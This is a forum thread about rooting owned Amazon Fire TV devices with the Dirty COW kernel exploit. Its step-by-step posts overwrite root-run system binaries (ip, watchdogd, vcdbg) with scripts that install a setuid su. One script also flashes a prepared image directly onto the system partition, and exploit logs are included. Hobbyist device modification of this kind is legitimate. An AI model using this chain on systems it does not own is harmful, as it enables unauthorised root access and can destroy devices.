[GUIDE] I Rooted my Fire TV via dirtycow

Search This thread
By:
Advanced…
C

christofsteel

Member
Feb 19, 2015
10
23
Hi,

i just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external Links here)

Dirtycow allows you to write to files, even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here). Another problem was, that the modification only last for the current boot, so I could not just modify boot scripts. I had to find a binary, that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV gui, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script, that deploys the su binary.

This is what I did:
  1. I compiled the dirtycow.c from timwr GitHub Repository CVE-2016-5195
  2. Then I put the resulting binary into /data/local/tmp on my Firetv (via adb)
  3. Now I pushed chainfires su binary to /data/local/tmp
  4. I copied the /system/bin/ip binary to /data/local/tmp
  5. I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755)
    Code: 
    #!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su    
/data/local/tmp/ip "[email protected]"
  6. After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script) [This may take a while]
  7. Now I went to my network settings of my Fire TV and changed them to a static ip address.
  8. I reconnected to my amazon Fire tv and typed su
    Code: 
    [email protected]:/ $ su
[email protected]:/ #
  9. Lastly I installed the Supersu.apk from chainfire

Root seems to work with the adb shell and the terminal app. Somehow it does not with amaze file manager. If I start it I get thrown into the amazon fire ui.

This rooting method should also work for other versions of the fireOS, though I have not tested them.
 
Last edited:
  • Like
Reactions: Fischfuss, tak437, carolynopatrny and 18 others
C

christofsteel

Member
Feb 19, 2015
10
23
sconnyuk said:
Will have to try this for fire stick.
Excellent find, ive been watching the dirtycow and this will come in handy if it works for fire stick.
Click to expand...
Click to collapse

Please report back :)
I think it is important to note, that I configured a static ip address to trigger the ip script. Root is permanent btw. as soon as the su binary is deployed, you can reboot all you like.
 
C

christianrodher

Member
Oct 21, 2016
20
20
  • Like
Reactions: Root-Maniac
C

christofsteel

Member
Feb 19, 2015
10
23
christianrodher said:
ok so when you do the exploit u where at selinux enforcing.... ok if is that simple after weve been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 im going to break the pc and the cell phone lol
Click to expand...
Click to collapse

No I did the exploit on my FireOS version 51.1.0.4. Afaik there was no SELinux present. SELinux is present in FireOS version 5.2.1.1. I can test, if this exlploit works on my now updated Fire TV.

Edit: It did not work :( I could not mount system read write. Seems like it only works for FireOS 3
 
Last edited:
R

ron1n541

Member
Oct 9, 2009
14
0
Really tried to get this to work. I think I'm close. I saw SELinux complain about the file size so I did some padding. Here's where I'm at

187594885]
I/Kernel ( 163): [ 1503.059370] (0)[163:healthd]healthd: battery l=100 v=4200
t=2.2 h=2 st=5 chg=u
W/linker (10431): ./dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
W/linker (10431): ./dirtycow: unused DT entry: type 0x6fffffff arg 0x1
I/exploit (10431): size 223296
I/exploit (10431):
I/exploit (10431): [*] mmap 0xf7546000
I/exploit (10431): [*] exploit (patch)
I/exploit (10431): [*] currently 0xf7546000=464c457f
I/exploit (10431): [*] madvise = 0xf7546000 223296
I/Kernel ( 0): [ 1509.432532]-(2)[0:swapper/2]CPU2: Booted secondary process
or
I/Kernel ( 0): [ 1509.437302]-(3)[0:swapper/3]CPU3: Booted secondary process
or
I/Kernel ( 87): [ 1509.437743] (0)[87:hps_main][HPS] (0004)(1)(0)action end(2
7)(35)(0)(2) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (6)(230)(0) (0)(0)(0) (0)(6)(230)(0)
(6)
I/exploit (10431): [*] madvise = 0 1048576
I/Kernel ( 0): [ 1511.439231]-(1)[0:swapper/1]CPU1: Booted secondary process
or
I/Kernel ( 87): [ 1511.440339] (0)[87:hps_main]CPU3: shutdown
I/Kernel ( 87): [ 1511.440873] (0)[87:hps_main][HPS] (0800)(1)(2)action end(1
05)(102)(0)(1) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (105)(10)(0) (1666)(10)(0) (0)(102
)(10)(0)(102)
I/exploit (10431): [*] /proc/self/mem -1048576 1048576
I/exploit (10431): [*] exploited 0xf7546000=464c457f
I/art ( 501): Background partial concurrent mark sweep GC freed 256902(12MB
) AllocSpace objects, 15(2MB) LOS objects, 33% free, 20MB/31MB, paused 690us tot
al 136.802ms
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=50.64 rxSuccessRate=38.79 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
93, 94 ignore because P2P is connected
I/Kernel ( 87): [ 1513.438566] (0)[87:hps_main]CPU2: shutdown
I/Kernel ( 87): [ 1513.439651] (0)[87:hps_main][HPS] (0400)(2)(1)action end(7
)(4)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (7)(10)(0) (288)(10)(0) (0)(4)(10)(0)(
4)
I/Kernel ( 87): [ 1515.438476] (0)[87:hps_main]CPU1: shutdown
I/Kernel ( 87): [ 1515.439146] (0)[87:hps_main][HPS] (0200)(2)(0)action end(4
)(3)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (4)(10)(0) (46)(10)(0) (0)(3)(10)(0)(3
)
I/Kernel ( 119): [ 1521.197537] (0)[119:wdtk-0]wdk: [WDK], local_bit:0x1, cpu:
0, check_bit:0x1, RT[1521197519702]
I/Kernel ( 119): [ 1521.197575] (0)[119:wdtk-0]wdk: [WDK]: kick Ex WDT,RT[1521
197568471]
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=3.98 rxSuccessRate=3.61 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
94, 95 ignore because P2P is connected
^C
C:\Program Files (x86)\Minimal ADB and Fastboot>

130|[email protected]:/data/local/tmp $ getenforce
Enforcing

130|[email protected]:/data/local/tmp $ getenforce
Enforcing

I have an AFTV2 running latest firmware. I also noticed chainfires su binary i had was 32bit so I grabbed a 64bit one. Still no dice

[email protected]:/data/local/tmp $ ls -la
-rwxrwxrwx shell shell 13776 2016-10-31 17:43 dirtycow
-rwxrwxrwx shell shell 223296 2016-10-31 18:27 ip
-rwxrwxrwx shell shell 223296 2016-10-31 19:48 ip_script
-rwxrwxrwx shell shell 108480 2016-10-31 19:39 su
[email protected]:/data/local/tmp $

Hopes this helps someone
 
V

VastVenomm

New member
Nov 3, 2016
2
0
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you :p

Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
 
Last edited:
B

bula1ca

Senior Member
Nov 18, 2014
346
63
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you :p

Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
Click to expand...
Click to collapse

you need to extract the SU binary file from Supersu. apk
 
  • Like
Reactions: VastVenomm
V

VastVenomm

New member
Nov 3, 2016
2
0
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.

Help would be appreciated, thank you.
 
Last edited:
C

christofsteel

Member
Feb 19, 2015
10
23
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you :p

Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
Click to expand...
Click to collapse

You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/

Then extract the zipfile and copy the su file from the arm folder.

Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.

VastVenomm said:
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.

Help would be appreciated, thank you.
Click to expand...
Click to collapse

You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
 
Last edited:
  • Like
Reactions: Kramar111
B

bula1ca

Senior Member
Nov 18, 2014
346
63
christofsteel said:
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/

Then extract the zipfile and copy the su file from the arm folder.

Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.



You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
Click to expand...
Click to collapse

Rename apk to zip and extract su no diffence from what I posted.
 
You must log in or register to reply here.

Similar threads

M
Configure IPTV on your FIre TV and watch Live TV
Replies
521
Views
455K
O
Olga9090
M
Amazon Fire TV
Replies
520
Views
308K
L
lukkingsing
G
List of Tested Sideloaded APKs for the Amazon Fire TV (Fire TV Stick)
Replies
307
Views
275K
G
GuestK00326
S
[GUIDE] Hardware root via emmc chip (requires soldering!)
Replies
577
Views
251K
N
navin23
Z
[ROOT] Amazon Fire TV Gen 2 (4k)
Replies
830
Views
164K
H
Han-Droid

Top Liked Posts

24 Hours All time
  • There are no posts matching your filters.
  • 21
    C
    christofsteel
    Hi,

    i just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external Links here)

    Dirtycow allows you to write to files, even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here). Another problem was, that the modification only last for the current boot, so I could not just modify boot scripts. I had to find a binary, that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV gui, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script, that deploys the su binary.

    This is what I did:
    1. I compiled the dirtycow.c from timwr GitHub Repository CVE-2016-5195
    2. Then I put the resulting binary into /data/local/tmp on my Firetv (via adb)
    3. Now I pushed chainfires su binary to /data/local/tmp
    4. I copied the /system/bin/ip binary to /data/local/tmp
    5. I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755)
      Code: 
      #!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su    
/data/local/tmp/ip "[email protected]"
    6. After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script) [This may take a while]
    7. Now I went to my network settings of my Fire TV and changed them to a static ip address.
    8. I reconnected to my amazon Fire tv and typed su
      Code: 
      [email protected]:/ $ su
[email protected]:/ #
    9. Lastly I installed the Supersu.apk from chainfire

    Root seems to work with the adb shell and the terminal app. Somehow it does not with amaze file manager. If I start it I get thrown into the amazon fire ui.

    This rooting method should also work for other versions of the fireOS, though I have not tested them.
    View
    14
    T
    tehlers
    Dear all,

    upon request, I tried to make things easier with a bundle of files and scripts you can run on the Fire TV Stick 5.2.1.1. I will take no responsibility if your stick bricks! I have prepared the system.img with TWRP and su.

    Here are the following files:

    Code: 
    Archive:  auto-root-fireos-5.2.1.1.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2017-08-23 15:25   auto-root-fireos-5.2.1.1/
     1565  2017-08-23 15:15   auto-root-fireos-5.2.1.1/run_me2.sh
     5288  2017-08-13 19:09   auto-root-fireos-5.2.1.1/watchdogd_new.txt
   370380  2017-08-05 14:57   auto-root-fireos-5.2.1.1/vcdbg_new.txt
     5400  2017-07-31 22:30   auto-root-fireos-5.2.1.1/dirtycow
     1351  2017-08-14 20:25   auto-root-fireos-5.2.1.1/run_me.sh
824180736  2017-08-13 20:31   auto-root-fireos-5.2.1.1/system-5.2.1.1-root-recovery.img
     1838  2017-08-23 15:25   auto-root-fireos-5.2.1.1/run_me3.sh
---------                     -------
824566558                     8 files

    https://www.androidfilehost.com/?fid=673368273298980527

    At first you put the whole directory into /data/local/tmp:

    Code: 
    > adb push auto-root-fireos-5.2.1.1 /data/local/tmp/auto-root-fireos-5.2.1.1

    Then you go into this directory and make sure the permissions are right:
    Code: 
    > adb shell
[email protected]:/ $ cd /data/local/tmp/auto-root-fireos-5.2.1.1
[email protected]:/data/local/tmp/auto-root-fireos-5.2.1.1 $ chmod 755 dirtycow run_me.sh run_me2.sh

    You start "./run_me.sh":

    Code: 
    #!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

echo "Saving watchdogd to /data/local/tmp/."
cp -a /system/bin/watchdogd /data/local/tmp/

echo "Saving vcdbg to /data/local/tmp/."
cp -a /system/bin/vcdbg /data/local/tmp/

echo "Now exchanging content of /system/bin/watchdogd"
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/auto-root-fireos-5.2.1.1/watchdogd_new.txt /system/bin/watchdogd; exit=$?; echo $exit; done
echo "Successful."

echo "Now exchanging content of /system/bin/vcdbg"
exit=1; while [ "$exit" != "0" ]; do ./dirtycow /data/local/tmp/auto-root-fireos-5.2.1.1/vcdbg_new.txt /system/bin/vcdbg; exit=$?; echo $exit; done
echo "Successful."

echo "Now play a video on Amazon Prime Video and skip a bit around to make changes persistent"
echo "Then press enter"
read

echo "Now we reboot, afterwards please run run_me2.sh in /data/local/tmp/auto-root-fireos-5.2.1.1."
reboot

    for the first part, exchanging the binaries and becoming root. The more dangerous part is "./run_me2.sh" which exchanges the whole /system with my prepared version:


    Code: 
    #!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

if [ "$(vcdbg -c id | grep 'uid=0(root) gid=0(root) context=u:r:init_shell:s0')" = "" ]; then
  echo "Step 1 (run_me.sh) went wrong, please try again"
  exit 1
fi

echo "Now copying system.img to /data/tmp"
vcdbg -c mkdir /data/tmp
vcdbg -c chmod 777 /data
vcdbg -c chmod 777 /data/tmp
cat /data/local/tmp/auto-root-fireos-5.2.1.1/system-5.2.1.1-root-recovery.img | vcdbg -c 'dd of=/data/tmp/system.img'
vcdbg -c chmod 777 /data/tmp/system.img

echo "Checking md5sum, please be patient."
if [ "`md5 /data/tmp/system.img | (read a b; echo $a)`" != "7f487939edb80ec87c4784943d6154fe" ]; then
  echo "system.img could not be fully copied, exiting"
  exit 1
fi
echo "Success"

echo "Now dd into real device, please do not interrupt"
vcdbg -c dd if=/data/tmp/system.img of=/dev/block/platform/sdhci.1/by-name/system
sync
echo "Success"

echo "Now we wait for 30 seconds to be sure that everything is written to flash"
sleep 30

#echo "Now we reboot, afterwards you should have TWRP and full root."
#reboot
echo "Now run run_me3.sh to check md5 of new files, or just reboot."


    For security, check md5sums of files before reboot:


    Code: 
    #!/system/bin/sh

echo "Please only run on FireTV Stick 1 (montoya), otherwise you will brick the device."
echo "Press enter to continue, or ctrl+c to cancel."
read

if [ "$(grep '^ro.build.version.fireos=5.2.1.1' /system/build.prop)" = "" ]; then
  echo "Please run only on FireOS 5.2.1.1"
  exit 1
fi

if [ "$(pwd)" != "/data/local/tmp/auto-root-fireos-5.2.1.1" ]; then
  echo "Please put everything from zip-file to /data/local/tmp/auto-root-fireos-5.2.1.1 and run script there"
  exit 1
fi

if [ "$(vcdbg -c id | grep 'uid=0(root) gid=0(root) context=u:r:init_shell:s0')" = "" ]; then
  echo "Step 1 (run_me.sh) went wrong, please try again"
  exit 1
fi

if [ ! -d /system/recovery ]; then
  echo "/system/recovery does not exist, exiting"
  exit 1
fi

echo "Checking md5sum of /system/recovery/2ndinit, please be patient."
if [ "`md5 /system/recovery/2ndinit | (read a b; echo $a)`" != "2dae0315ee0b7704215d8d538c168a58" ]; then
  echo "/system/recovery/2ndinit is not fully ok, exiting"
  exit 1
fi
echo "Success, /system/recovery/2ndinit is ok."

echo "Checking md5sum of /system/recovery/2ndinitstub, please be patient."
if [ "`md5 /system/recovery/2ndinitstub | (read a b; echo $a)`" != "43069eea7d009c0a86b87ceef60116fd" ]; then   
  echo "/system/recovery/2ndinitstub is not fully ok, exiting"          
  exit 1  
fi    
echo "Success, /system/recovery/2ndinitstub is ok."

echo "Checking md5sum of /system/recovery/ramdisk-recovery.cpio.lzma, please be patient."
if [ "`md5 /system/recovery/ramdisk-recovery.cpio.lzma | (read a b; echo $a)`" != "3dcb1af64bd7d2e7aed616e4a5328497" ]; then   
  echo "/system/recovery/ramdisk-recovery.cpio.lzma is not fully ok, exiting"          
  exit 1  
fi    
echo "Success, /system/recovery/ramdisk-recovery.cpio.lzma is ok."    

sync

echo "Now you can reboot, TWRP files are all ok."


    Again: I'll take no responsibility for any damage caused. I have prepared everything to the best of my knowledge. If you use it and succeed (or fail), please report back here.

    Best

    Tim

    EDIT: Updated to newest version, if you have problems with copying data to /data/tmp (in run_me2.sh), it might be worthwhile to test over network (not via USB) and use adb from a linux system.

    EDIT2: Upon request the hint from the later pages: Instead of playing a video to sync changes to flash (short before the first script finishes, it seems to be more effective to fill the memory with artificial content until completely full. This can be done with a memory filling App, see https://forum.xda-developers.com/showpost.php?p=73766497&postcount=157 and https://forum.xda-developers.com/showpost.php?p=73838299&postcount=163.
    View
    7
    slater_g
    slater_g
    Alright, here are my step-by-step instructions. All credits go to @christofsteel and of course @rbox

    Do this at your own risk!!!

    Note 1: My dirtycow file differs from the one @Anutter226 uploaded. It seems to me that he uploaded the "arm" version while I used the "arm-v7a" version. I did not try his but it might also work similarly.

    Note 2: I did this all starting on firmware 51.1.4.0. I do not know if it works with other fimwares.

    Note 3: Maybe this also works with a Fire TV Stick. At least I did everything over WiFi on the Box just fine.

    1. Make sure you have adb installed and working.
    2. Find out your Fire TV's IP address. I had mine set to use DHCP (dynamic IP).
    3. Connect to your Fire TV (replace with your Fire TV IP) with ADB in the terminal or commandline:
      Code: 
      adb connect 192.168.0.111
    4. Download and extract my files to some directory.
    5. Navigate to that directory in the terminal.
    6. Copy the three files to the Fire TV with the following three commands:
      Code: 
      adb push dirtycow /data/local/tmp
adb push su /data/local/tmp
adb push ip_script /data/local/tmp
    7. Now, log into the adb shell on the Fire TV:
      Code: 
      adb shell
    8. You are now logged into the shell of the Fire TV, indicated by a $ in the new line.
    9. Make the ip_script executable with this command:
      Code: 
      chmod 755 /data/local/tmp/ip_script
    10. Make the exploit executable with this command:
      Code: 
      chmod 755 /data/local/tmp/dirtycow
    11. Copy the original "ip" binary of the Fire TV to the temp folder:
      Code: 
      cp /system/bin/ip /data/local/tmp
    12. Now it is time to run the exploit. As stated in the OP, this might take some time like 5 to 10 minutes:
      Code: 
      ./dirtycow /system/bin/ip ip_script
    13. When it's done, it should show something like this (exact numbers not important here):
      Code: 
      [ *] mmap 0xb51e5000
[ *] exploit (patch)
[ *] currently 0xb51e5000=464c457f
[ *] madvise = 0xb51e5000 17944
[ *] madvise = 0 1048576
[ *] /proc/self/mem 1635778560 1048576
[ *] exploited 0xb51e5000=464c457f
    14. By the way: This step is permanent. So if you reboot the Fire TV, you do not have to do this again.
    15. Optional: You can check if the exploit was executed correctly by typing:
      Code: 
      cat /system/bin/ip
    16. This should give you this:
      Code: 
      #!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su    
/data/local/tmp/ip "[email protected]"
    17. End of optional part.
    18. Now you can exit the adb shell with:
      Code: 
      exit
    19. Next you have to trigger the exploit: Go into the settings of your Fire TV and use a static IP. There should be somewhere an "advanced" button to set this. I did this via WiFi and to get a static IP I had to "forget" the current WiFi, then select it again, type the passwort and (important) before confirming the password, the "advanced" button was at the bottom of the password dialog.
    20. Set the IP, Gateway, DNS1, DNS2 and some length setting that I set to 24 according to what works in your network. I used a different IP address than before; don't know if that matters.
    21. The Fire TV should now be connected to the network again.
    22. Head back to your terminal and connect again (replace IP with your Fire TV's new static IP):
      Code: 
      adb connect 192.168.0.222
    23. Now, log into the adb shell on the Fire TV:
      Code: 
      adb shell
    24. Test the superuser access:
      Code: 
      su
    25. There should now be a # instead of a $. Therefore you have root!
    26. Now you can continue with downgrading. For this, follow this guide http://www.aftvnews.com/start/ and select the Fire TV 1 (2014) -> Yes -> 51.1.1.0 (not your FW, but that leads to the correct guide)
    27. Start with 4. of the guide to downgrade and follow along with 5., 6. and 7.
    28. Go the the next page of the guide and do steps 2. to 6.
    29. Step 7. of that page is outdated. Instead install TWRP http://forum.xda-developers.com/fire-tv/development/firetv-1-bueller-twrp-recovery-t3383286
    30. After that, install the newest ROM from TRWP. ROM can be found here: http://forum.xda-developers.com/fire-tv/development/prerooted-stock-images-t2882337

    Happy flashing!
    View
    6
    T
    tehlers
    Just for the record: We successfully rooted the stick from @Spider1996. All changes needed are in the updated file on androidfilehost.com in post: #109
    View
    4
    slater_g
    slater_g
    Also succeeded with a Fire TV Box Gen 1 on 51.1.4.0.
    Can post the binaries and longer tutorial if needed.
    Also downgraded to 51.1.0.2, rooted with TowelRoot and did a full bootloader unlock.
    View

New posts